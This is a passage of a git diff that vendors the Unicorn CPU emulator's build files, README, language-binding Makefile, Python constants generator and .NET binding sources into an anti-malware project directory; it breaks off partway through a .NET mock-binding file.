sparc-softmmu,sparc64-softmmu, +endif + +UC_OBJ_ALL = $(UC_TARGET_OBJ) list.o uc.o + +UNICORN_CFLAGS += -fPIC + +# Verbose output? +V ?= 0 + +# on MacOS, by default do not compile in Universal format +MACOS_UNIVERSAL ?= no + +ifeq ($(UNICORN_DEBUG),yes) +CFLAGS += -g +else +CFLAGS += -O3 +UNICORN_QEMU_FLAGS += --disable-debug-info +endif + +ifeq ($(UNICORN_ASAN),yes) +CC = clang -fsanitize=address -fno-omit-frame-pointer +CXX = clang++ -fsanitize=address -fno-omit-frame-pointer +AR = llvm-ar +LDFLAGS := -fsanitize=address ${LDFLAGS} +endif + +ifeq ($(CROSS),) +CC ?= cc +AR ?= ar +RANLIB ?= ranlib +STRIP ?= strip +else +CC = $(CROSS)-gcc +AR = $(CROSS)-ar +RANLIB = $(CROSS)-ranlib +STRIP = $(CROSS)-strip +endif + +ifeq ($(PKG_EXTRA),) +PKG_VERSION = $(PKG_MAJOR).$(PKG_MINOR) +else +PKG_VERSION = $(PKG_MAJOR).$(PKG_MINOR).$(PKG_EXTRA) +endif + +API_MAJOR=$(shell echo `grep -e UC_API_MAJOR include/unicorn/unicorn.h | grep -v = | awk '{print $$3}'` | awk '{print $$1}') + +# Apple? +ifeq ($(UNAME_S),Darwin) +EXT = dylib +VERSION_EXT = $(API_MAJOR).$(EXT) +$(LIBNAME)_LDFLAGS += -dynamiclib -install_name @rpath/lib$(LIBNAME).$(VERSION_EXT) -current_version $(PKG_MAJOR).$(PKG_MINOR).$(PKG_EXTRA) -compatibility_version $(PKG_MAJOR).$(PKG_MINOR) +AR_EXT = a +UNICORN_CFLAGS += -fvisibility=hidden + +ifeq ($(MACOS_UNIVERSAL),yes) +$(LIBNAME)_LDFLAGS += -m32 -arch i386 -m64 -arch x86_64 +UNICORN_CFLAGS += -m32 -arch i386 -m64 -arch x86_64 +endif + +# Cygwin? +else ifneq ($(filter CYGWIN%,$(UNAME_S)),) +EXT = dll +AR_EXT = a +BIN_EXT = .exe +UNICORN_CFLAGS := $(UNICORN_CFLAGS:-fPIC=) +#UNICORN_QEMU_FLAGS += --disable-stack-protector + +# mingw? 
+else ifneq ($(filter MINGW%,$(UNAME_S)),) +EXT = dll +AR_EXT = a +BIN_EXT = .exe +UNICORN_QEMU_FLAGS += --disable-stack-protector +UNICORN_CFLAGS := $(UNICORN_CFLAGS:-fPIC=) +$(LIBNAME)_LDFLAGS += -Wl,--output-def,unicorn.def +DO_WINDOWS_EXPORT = 1 + +# Haiku +else ifneq ($(filter Haiku%,$(UNAME_S)),) +EXT = so +VERSION_EXT = $(EXT).$(API_MAJOR) +AR_EXT = a +$(LIBNAME)_LDFLAGS += -Wl,-Bsymbolic-functions,-soname,lib$(LIBNAME).$(VERSION_EXT) +UNICORN_CFLAGS := $(UNICORN_CFLAGS:-fPIC=) +UNICORN_QEMU_FLAGS += --disable-stack-protector + +# Linux, Darwin +else +EXT = so +VERSION_EXT = $(EXT).$(API_MAJOR) +AR_EXT = a +$(LIBNAME)_LDFLAGS += -Wl,-Bsymbolic-functions,-soname,lib$(LIBNAME).$(VERSION_EXT) +UNICORN_CFLAGS += -fvisibility=hidden +endif + +ifeq ($(UNICORN_SHARED),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) +LIBRARY = $(LIBNAME).$(EXT) +else ifneq ($(filter CYGWIN%,$(UNAME_S)),) +LIBRARY = cyg$(LIBNAME).$(EXT) +LIBRARY_DLLA = lib$(LIBNAME).$(EXT).$(AR_EXT) +$(LIBNAME)_LDFLAGS += -Wl,--out-implib=$(LIBRARY_DLLA) +$(LIBNAME)_LDFLAGS += -lssp +# Linux, Darwin +else +LIBRARY = lib$(LIBNAME).$(VERSION_EXT) +LIBRARY_SYMLINK = lib$(LIBNAME).$(EXT) +endif +endif + +ifeq ($(UNICORN_STATIC),yes) +ifneq ($(filter MINGW%,$(UNAME_S)),) +ARCHIVE = $(LIBNAME).$(AR_EXT) +# Cygwin, Linux, Darwin +else +ARCHIVE = lib$(LIBNAME).$(AR_EXT) +endif +endif + +INSTALL_BIN ?= install +INSTALL_DATA ?= $(INSTALL_BIN) -m0644 +INSTALL_LIB ?= $(INSTALL_BIN) -m0755 +PKGCFGF = $(LIBNAME).pc +PREFIX ?= /usr +DESTDIR ?= + +LIBDIRARCH ?= lib +# Uncomment the below line to installs x86_64 libs to lib64/ directory. +# Or better, pass 'LIBDIRARCH=lib64' to 'make install/uninstall' via 'make.sh'. +#LIBDIRARCH ?= lib64 + +LIBDIR ?= $(PREFIX)/$(LIBDIRARCH) +INCDIR ?= $(PREFIX)/include +BINDIR ?= $(PREFIX)/bin + +LIBDATADIR ?= $(LIBDIR) + +# Don't redefine $LIBDATADIR when global environment variable +# USE_GENERIC_LIBDATADIR is set. This is used by the pkgsrc framework. 
+ +ifndef USE_GENERIC_LIBDATADIR +ifeq ($(UNAME_S), FreeBSD) +LIBDATADIR = $(PREFIX)/libdata +else ifeq ($(UNAME_S), DragonFly) +LIBDATADIR = $(PREFIX)/libdata +endif +endif + +ifeq ($(PKG_EXTRA),) +PKGCFGDIR = $(LIBDATADIR)/pkgconfig +else +PKGCFGDIR ?= $(LIBDATADIR)/pkgconfig +endif + +$(LIBNAME)_LDFLAGS += -lm + +.PHONY: test fuzz bindings clean FORCE + +all: unicorn + $(MAKE) -C samples + +qemu/config-host.mak: qemu/configure + cd qemu && \ + ./configure --cc="${CC}" --extra-cflags="$(UNICORN_CFLAGS)" --target-list="$(UNICORN_TARGETS)" ${UNICORN_QEMU_FLAGS} + @printf "$(UNICORN_ARCHS)" > config.log + +uc.o: qemu/config-host.mak FORCE + $(MAKE) -C qemu $(SMP_MFLAGS) + +$(UC_TARGET_OBJ) list.o: uc.o + @echo "--- $^ $@" > /dev/null + +unicorn: $(LIBRARY) $(ARCHIVE) + +$(LIBRARY): $(UC_OBJ_ALL) +ifeq ($(UNICORN_SHARED),yes) +ifeq ($(V),0) + $(call log,GEN,$(LIBRARY)) + @$(CC) $(CFLAGS) -shared $(UC_OBJ_ALL) -o $(LIBRARY) $($(LIBNAME)_LDFLAGS) + @-ln -sf $(LIBRARY) $(LIBRARY_SYMLINK) +else + $(CC) $(CFLAGS) -shared $(UC_OBJ_ALL) -o $(LIBRARY) $($(LIBNAME)_LDFLAGS) + -ln -sf $(LIBRARY) $(LIBRARY_SYMLINK) +endif +ifeq ($(DO_WINDOWS_EXPORT),1) +ifneq ($(filter MINGW32%,$(UNAME_S)),) + cmd //C "windows_export.bat x86" +else + cmd //C "windows_export.bat x64" +endif +endif +endif + +$(ARCHIVE): $(UC_OBJ_ALL) +ifeq ($(UNICORN_STATIC),yes) +ifeq ($(V),0) + $(call log,GEN,$(ARCHIVE)) + @$(AR) q $(ARCHIVE) $(UC_OBJ_ALL) + @$(RANLIB) $(ARCHIVE) +else + $(AR) q $(ARCHIVE) $(UC_OBJ_ALL) + $(RANLIB) $(ARCHIVE) +endif +endif + +$(PKGCFGF): + $(generate-pkgcfg) + + +fuzz: all + $(MAKE) -C tests/fuzz all + +test: all + $(MAKE) -C tests/unit test + $(MAKE) -C tests/regress test + $(MAKE) -C bindings test + +install: $(LIBRARY) $(ARCHIVE) $(PKGCFGF) + install -d $(DESTDIR)$(LIBDIR) +ifeq ($(UNICORN_SHARED),yes) +ifneq ($(filter CYGWIN%,$(UNAME_S)),) + $(INSTALL_LIB) $(LIBRARY) $(DESTDIR)$(BINDIR) + $(INSTALL_DATA) $(LIBRARY_DLLA) $(DESTDIR)$(LIBDIR) +else + $(INSTALL_LIB) $(LIBRARY) 
$(DESTDIR)$(LIBDIR) +endif +ifneq ($(VERSION_EXT),) + cd $(DESTDIR)$(LIBDIR) && \ + ln -sf lib$(LIBNAME).$(VERSION_EXT) lib$(LIBNAME).$(EXT) +endif +endif +ifeq ($(UNICORN_STATIC),yes) + $(INSTALL_DATA) $(ARCHIVE) $(DESTDIR)$(LIBDIR) +endif + install -d $(DESTDIR)$(INCDIR)/$(LIBNAME) + $(INSTALL_DATA) include/unicorn/*.h $(DESTDIR)$(INCDIR)/$(LIBNAME) + install -d $(DESTDIR)$(PKGCFGDIR) + $(INSTALL_DATA) $(PKGCFGF) $(DESTDIR)$(PKGCFGDIR)/ + + +TAG ?= HEAD +ifeq ($(TAG), HEAD) +DIST_VERSION = latest +else +DIST_VERSION = $(TAG) +endif + +bindings: all + $(MAKE) -C bindings build + $(MAKE) -C bindings samples + +dist: + git archive --format=tar.gz --prefix=unicorn-$(DIST_VERSION)/ $(TAG) > unicorn-$(DIST_VERSION).tgz + git archive --format=zip --prefix=unicorn-$(DIST_VERSION)/ $(TAG) > unicorn-$(DIST_VERSION).zip + + +# run "make header" whenever qemu/header_gen.py is modified +header: + $(eval TARGETS := m68k arm armeb aarch64 aarch64eb mips mipsel mips64 mips64el\ + sparc sparc64 x86_64) + $(foreach var,$(TARGETS),\ + $(shell python qemu/header_gen.py $(var) > qemu/$(var).h;)) + @echo "Generated headers for $(TARGETS)." 
+ + +uninstall: + rm -rf $(INCDIR)/$(LIBNAME) + rm -f $(LIBDIR)/lib$(LIBNAME).* + rm -f $(BINDIR)/cyg$(LIBNAME).* + rm -f $(PKGCFGDIR)/$(LIBNAME).pc + + +clean: + $(MAKE) -C qemu distclean + rm -rf *.d *.o + rm -rf lib$(LIBNAME)* $(LIBNAME)*.lib $(LIBNAME)*.dll $(LIBNAME)*.a $(LIBNAME)*.def $(LIBNAME)*.exp cyg$(LIBNAME)*.dll + $(MAKE) -C samples clean + $(MAKE) -C tests/unit clean + + +define generate-pkgcfg + echo 'Name: unicorn' > $(PKGCFGF) + echo 'Description: Unicorn emulator engine' >> $(PKGCFGF) + echo 'Version: $(PKG_VERSION)' >> $(PKGCFGF) + echo 'libdir=$(LIBDIR)' >> $(PKGCFGF) + echo 'includedir=$(INCDIR)' >> $(PKGCFGF) + echo 'archive=$${libdir}/libunicorn.a' >> $(PKGCFGF) + echo 'Libs: -L$${libdir} -lunicorn' >> $(PKGCFGF) + echo 'Cflags: -I$${includedir}' >> $(PKGCFGF) +endef + + +define log + @printf " %-7s %s\n" "$(1)" "$(2)" +endef diff --git a/ai_anti_malware/unicorn/unicorn-master/README.md b/ai_anti_malware/unicorn/unicorn-master/README.md new file mode 100644 index 0000000..1a19f30 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/README.md @@ -0,0 +1,54 @@ +Unicorn Engine +============== + +[![Join the chat at https://gitter.im/unicorn-engine/chat](https://badges.gitter.im/unicorn-engine/unicorn.svg)](https://gitter.im/unicorn-engine/chat?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) +[![Build Status](https://travis-ci.org/unicorn-engine/unicorn.svg?branch=master)](https://travis-ci.org/unicorn-engine/unicorn) +[![pypi downloads](https://pepy.tech/badge/unicorn)](https://pepy.tech/project/unicorn) +[![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/unicorn.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:unicorn) + +Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework +based on [QEMU](http://qemu.org). 
+ +Unicorn offers some unparalleled features: + +- Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, SPARC, and X86 (16, 32, 64-bit) +- Clean/simple/lightweight/intuitive architecture-neutral API +- Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, and Lua. +- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed) +- High performance via Just-In-Time compilation +- Support for fine-grained instrumentation at various levels +- Thread-safety by design +- Distributed under free software license GPLv2 + +Further information is available at http://www.unicorn-engine.org + + +License +------- + +This project is released under the [GPL license](COPYING). + + +Compilation & Docs +------------------ + +See [docs/COMPILE.md](docs/COMPILE.md) file for how to compile and install Unicorn. + +More documentation is available in [docs/README.md](docs/README.md). + + +Contact +------- + +[Contact us](http://www.unicorn-engine.org/contact/) via mailing list, email or twitter for any questions. + + +Contribute +---------- + +If you want to contribute, please pick up something from our [Github issues](https://github.com/unicorn-engine/unicorn/issues). + +We also maintain a list of more challenged problems in a [TODO list](https://github.com/unicorn-engine/unicorn/wiki/TODO). + +[CREDITS.TXT](CREDITS.TXT) records important contributors of our project. + diff --git a/ai_anti_malware/unicorn/unicorn-master/SPONSORS.TXT b/ai_anti_malware/unicorn/unicorn-master/SPONSORS.TXT new file mode 100644 index 0000000..ecdc457 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/SPONSORS.TXT @@ -0,0 +1,7 @@ +* Version 1.0.2 - October 21st, 2020 + +Release 1.0.2 was sponsored by the following companies (in no particular order). 
+ +- Catena Cyber: https://catenacyber.fr +- Grayshift: https://grayshift.com +- Google: https://google.com diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/Makefile new file mode 100644 index 0000000..296b44f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/Makefile @@ -0,0 +1,54 @@ +# Unicorn Engine +# By Nguyen Anh Quynh & Dang Hoang Vu, 2015 +DIFF = diff + +SAMPLE_SOURCE = $(wildcard ../samples/*.c) +SAMPLE = $(SAMPLE_SOURCE:../samples/%.c=%) +SAMPLE := $(SAMPLE:mem_apis=) +SAMPLE := $(SAMPLE:sample_batch_reg=) +SAMPLE := $(SAMPLE:sample_x86_32_gdt_and_seg_regs=) +SAMPLE := $(SAMPLE:shellcode=) + +UNAME_S := $(shell uname -s) +ifeq ($(UNAME_S), Linux) +ENV_VARS = LD_PRELOAD=librt.so LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ +else +ENV_VARS = LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ LIBUNICORN_PATH=$(TRAVIS_BUILD_DIR) +endif + + +.PHONY: build install python c clean check test + +build: + $(MAKE) -C python gen_const + $(MAKE) -C go gen_const + $(MAKE) -C java gen_const + $(MAKE) -C ruby gen_const + python const_generator.py dotnet + python const_generator.py pascal + +install: build + $(MAKE) -C python install + $(MAKE) -C java install + +test: $(SAMPLE:%=%.py.test) + +c: + $(MAKE) -C ../samples +python: + $(MAKE) -C python +%.c.txt: c + $(ENV_VARS) ../samples/$(@:%.c.txt=%) > $@ +%.py.txt: python + $(ENV_VARS) python python/$(@:%.txt=%) > $@ + +%.py.test: %.c.txt %.py.txt + $(DIFF) -u $(@:%.py.test=%.c.txt) $(@:%.py.test=%.py.txt) + +clean: +# rm -rf *.txt + $(MAKE) -C python clean + $(MAKE) -C java clean + +check: + make -C python check diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/README b/ai_anti_malware/unicorn/unicorn-master/bindings/README new file mode 100644 index 0000000..4df67f6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/README @@ -0,0 +1,38 @@ +This directory contains bindings & test code for Python, Java, Go and .NET. 
+See /README or /README.TXT or /README.md for how to install each binding. + +The following bindings are contributed by community. + +- Java binding: by Chris Eagle. +- Go binding: by Ryan Hileman. +- .NET binding: by Antonio Parata. +- Ruby binding: by Sascha Schirra +- Haskell binding: by Adrian Herrera. +- VB6 binding: David Zimmer. +- FreePascal/Delphi binding: Mohamed Osama. + +More bindings created & maintained externally by community are available as follows. + +- UnicornPascal: Delphi/Free Pascal binding (by Stievie). + https://github.com/stievie/UnicornPascal + +- Unicorn-Rs: Rust binding (by Sébastien Duquette) + https://github.com/ekse/unicorn-rs + +- UnicornEngine: Perl binding (by Vikas Naresh Kumar) + https://metacpan.org/pod/UnicornEngine + +- Unicorn.CR: Crystal binding (by Benoit Côté-Jodoin) + https://github.com/Becojo/unicorn.cr + +- Deimos/unicorn: D binding (by Vladimir Panteleev) + https://github.com/D-Programming-Deimos/unicorn + +- Unicorn-Lua: Lua binding (by Diego Argueta) + https://github.com/dargueta/unicorn-lua + +- pharo-unicorn: Pharo binding (by Guille Polito) + https://github.com/guillep/pharo-unicorn + +- Unicorn.js: JavaScript binding (by Alexandro Sanchez) + https://github.com/AlexAltea/unicorn.js diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/const_generator.py b/ai_anti_malware/unicorn/unicorn-master/bindings/const_generator.py new file mode 100644 index 0000000..daa18f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/const_generator.py @@ -0,0 +1,204 @@ +#!/usr/bin/env python3 +# Unicorn Engine +# By Dang Hoang Vu, 2013 +from __future__ import print_function +import sys, re, os + +INCL_DIR = os.path.join('..', 'include', 'unicorn') + +include = [ 'arm.h', 'arm64.h', 'mips.h', 'x86.h', 'sparc.h', 'm68k.h', 'unicorn.h' ] + +template = { + 'python': { + 'header': "# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [%s_const.py]\n", + 'footer': "", + 'line_format': 'UC_%s = %s\n', + 'out_file': './python/unicorn/%s_const.py', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'arm', + 'arm64.h': 'arm64', + 'mips.h': 'mips', + 'x86.h': 'x86', + 'sparc.h': 'sparc', + 'm68k.h': 'm68k', + 'unicorn.h': 'unicorn', + 'comment_open': '#', + 'comment_close': '', + }, + 'ruby': { + 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.rb]\n\nmodule UnicornEngine\n", + 'footer': "end", + 'line_format': '\tUC_%s = %s\n', + 'out_file': './ruby/unicorn_gem/lib/unicorn_engine/%s_const.rb', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'arm', + 'arm64.h': 'arm64', + 'mips.h': 'mips', + 'x86.h': 'x86', + 'sparc.h': 'sparc', + 'm68k.h': 'm68k', + 'unicorn.h': 'unicorn', + 'comment_open': '#', + 'comment_close': '', + }, + 'go': { + 'header': "package unicorn\n// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.go]\nconst (\n", + 'footer': ")", + 'line_format': '\t%s = %s\n', + 'out_file': './go/unicorn/%s_const.go', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'arm', + 'arm64.h': 'arm64', + 'mips.h': 'mips', + 'x86.h': 'x86', + 'sparc.h': 'sparc', + 'm68k.h': 'm68k', + 'unicorn.h': 'unicorn', + 'comment_open': '//', + 'comment_close': '', + }, + 'java': { + 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\npackage unicorn;\n\npublic interface %sConst {\n", + 'footer': "\n}\n", + 'line_format': ' public static final int UC_%s = %s;\n', + 'out_file': './java/unicorn/%sConst.java', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'Arm', + 'arm64.h': 'Arm64', + 'mips.h': 'Mips', + 'x86.h': 'X86', + 'sparc.h': 'Sparc', + 'm68k.h': 'M68k', + 'unicorn.h': 'Unicorn', + 'comment_open': '//', + 'comment_close': '', + }, + 'dotnet': { + 'header': "// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT\n\nnamespace UnicornManaged.Const\n\nopen System\n\n[]\nmodule %s =\n", + 'footer': "\n", + 'line_format': ' let UC_%s = %s\n', + 'out_file': os.path.join('dotnet', 'UnicornManaged', 'Const', '%s.fs'), + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'Arm', + 'arm64.h': 'Arm64', + 'mips.h': 'Mips', + 'x86.h': 'X86', + 'sparc.h': 'Sparc', + 'm68k.h': 'M68k', + 'unicorn.h': 'Common', + 'comment_open': ' //', + 'comment_close': '', + }, + 'pascal': { + 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nunit %sConst;\n\ninterface\n\nconst", + 'footer': "\nimplementation\nend.", + 'line_format': ' UC_%s = %s;\n', + 'out_file': os.path.join('pascal', 'unicorn', '%sConst.pas'), + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'Arm', + 'arm64.h': 'Arm64', + 'mips.h': 'Mips', + 'x86.h': 'X86', + 'sparc.h': 'Sparc', + 'm68k.h': 'M68k', + 'unicorn.h': 'Unicorn', + 'comment_open': '//', + 'comment_close': '', + }, +} + +# markup for comments to be added to autogen files +MARKUP = '//>' + +def gen(lang): + global include, INCL_DIR + templ = template[lang] + for target in include: + prefix = templ[target] + outfile = open(templ['out_file'] %(prefix), 'wb') # open as binary prevents windows newlines + outfile.write((templ['header'] % (prefix)).encode("utf-8")) + if target == 'unicorn.h': + prefix = '' + with open(os.path.join(INCL_DIR, target)) as f: + lines = f.readlines() + + previous = {} + count = 0 + for line in lines: + line = line.strip() + + if line.startswith(MARKUP): # markup for comments + outfile.write(("\n%s%s%s\n" %(templ['comment_open'], \ + line.replace(MARKUP, ''), templ['comment_close'])).encode("utf-8")) + continue + + if line == '' or line.startswith('//'): + continue + + tmp = line.strip().split(',') + for t in tmp: + t = t.strip() + if not t or t.startswith('//'): continue + f = re.split('\s+', t) + + # parse #define UC_TARGET (num) + define = False + 
if f[0] == '#define' and len(f) >= 3: + define = True + f.pop(0) + f.insert(1, '=') + + if f[0].startswith("UC_" + prefix.upper()): + if len(f) > 1 and f[1] not in ('//', '='): + print("WARNING: Unable to convert %s" % f) + print(" Line =", line) + continue + elif len(f) > 1 and f[1] == '=': + rhs = ''.join(f[2:]) + else: + rhs = str(count) + + lhs = f[0].strip() + # evaluate bitshifts in constants e.g. "UC_X86 = 1 << 1" + match = re.match(r'(?P\s*\d+\s*<<\s*\d+\s*)', rhs) + if match: + rhs = str(eval(match.group(1))) + else: + # evaluate references to other constants e.g. "UC_ARM_REG_X = UC_ARM_REG_SP" + match = re.match(r'^([^\d]\w+)$', rhs) + if match: + rhs = previous[match.group(1)] + + if not rhs.isdigit(): + for k, v in previous.items(): + rhs = re.sub(r'\b%s\b' % k, v, rhs) + rhs = str(eval(rhs)) + + lhs_strip = re.sub(r'^UC_', '', lhs) + count = int(rhs) + 1 + if (count == 1): + outfile.write(("\n").encode("utf-8")) + + outfile.write((templ['line_format'] % (lhs_strip, rhs)).encode("utf-8")) + previous[lhs] = str(rhs) + + outfile.write((templ['footer']).encode("utf-8")) + outfile.close() + +def main(): + lang = sys.argv[1] + if lang == "all": + for lang in template.keys(): + print("Generating constants for {}".format(lang)) + gen(lang) + else: + if not lang in template: + raise RuntimeError("Unsupported binding %s" % lang) + gen(lang) + +if __name__ == "__main__": + if len(sys.argv) < 2: + print("Usage:", sys.argv[0], " ") + print("Supported: {}".format(["all"] + [x for x in template.keys()])) + sys.exit(1) + main() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/README.md new file mode 100644 index 0000000..7717164 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/README.md @@ -0,0 +1,30 @@ +This documentation explains how to use the .NET binding for Unicorn +from source. + +0. 
Install the core engine as a dependency + + Follow README in the root directory to compile & install the core. + +1. Compile the code + + [Windows] + To compile the code open the UnicornSln.sln with Microsoft Visual + Studio 12 or with a newer version and just press Ctrl+Shift+B to build + the solution. + + You need to have installed at least version 4.5 of the .NET framework. + + [Linux] + TODO + +2. Usage + + The solution includes the testing project UnicornTests with examples + of usage. + + In order to use the library in your project just add a reference to + the .NET library and be sure to copy the unmanaged unicorn.dll + library in the output directory. + + The naming convention used is the Upper Camel Case, this mean that to + invoke the uc_mem_read method you have to search for the MemRead method. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornDotNet.sln b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornDotNet.sln new file mode 100644 index 0000000..90aa5b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornDotNet.sln @@ -0,0 +1,28 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 14 +VisualStudioVersion = 14.0.23107.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UnicornSamples", "UnicornSamples\UnicornSamples.csproj", "{B80B5987-1E24-4309-8BF9-C4F91270F21C}" +EndProject +Project("{F2A71F9B-5D33-465A-A702-920D77279786}") = "UnicornManaged", "UnicornManaged\UnicornManaged.fsproj", "{0C21F1C1-2725-4A46-9022-1905F85822A5}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.Build.0 = Debug|Any 
CPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.ActiveCfg = Release|Any CPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.Build.0 = Release|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.Build.0 = Debug|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.ActiveCfg = Release|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/AssemblyInfo.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/AssemblyInfo.fs new file mode 100644 index 0000000..16d8c91 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/AssemblyInfo.fs @@ -0,0 +1,41 @@ +namespace UnicornManaged.AssemblyInfo + +open System.Reflection +open System.Runtime.CompilerServices +open System.Runtime.InteropServices + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +[] +[] +[] +[] +[] +[] +[] +[] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. 
+[] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +[] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [] +[] +[] + +do + () \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/BindingFactory.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/BindingFactory.fs new file mode 100644 index 0000000..f55f72e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/BindingFactory.fs @@ -0,0 +1,13 @@ +namespace UnicornManaged.Binding + +open System + +module BindingFactory = + let mutable _instance = NativeBinding.instance + + let setDefaultBinding(binding: IBinding) = + _instance <- binding + + let getDefault() = + _instance + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/IBinding.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/IBinding.fs new file mode 100644 index 0000000..7ef6d27 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/IBinding.fs @@ -0,0 +1,28 @@ +namespace UnicornManaged.Binding + +open System + +type IBinding = + interface + abstract Version : UIntPtr * UIntPtr -> Int32 + abstract ArchSupported : Int32 -> Boolean + abstract UcOpen : UInt32 * UInt32 * UIntPtr array -> Int32 + abstract Close : UIntPtr -> Int32 + abstract Strerror : Int32 -> IntPtr + abstract Errono : UIntPtr -> Int32 + abstract RegRead : UIntPtr * Int32 * Byte array -> Int32 + abstract RegWrite : UIntPtr * Int32 * Byte array -> Int32 + abstract MemRead : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32 + abstract MemWrite : UIntPtr * UInt64 * Byte array * 
UIntPtr -> Int32 + abstract EmuStart : UIntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32 + abstract EmuStop : UIntPtr -> Int32 + abstract HookDel : UIntPtr * UIntPtr -> Int32 + abstract MemMap : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32 + abstract MemMapPtr : UIntPtr * UInt64 * UIntPtr * UInt32 * UIntPtr -> Int32 + abstract MemUnmap : UIntPtr * UInt64 * UIntPtr -> Int32 + abstract MemProtect : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32 + abstract HookAddNoarg : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 -> Int32 + abstract HookAddArg0 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * Int32 -> Int32 + abstract HookAddArg0Arg1 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32 + end + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/MockBinding.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/MockBinding.fs new file mode 100644 index 0000000..7b99c8e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/MockBinding.fs @@ -0,0 +1,51 @@ +namespace UnicornManaged.Binding + +open System + +module internal MockBinding = + // by using a mutables variables it is easier to create testing code + let mutable version = fun(major, minor) -> 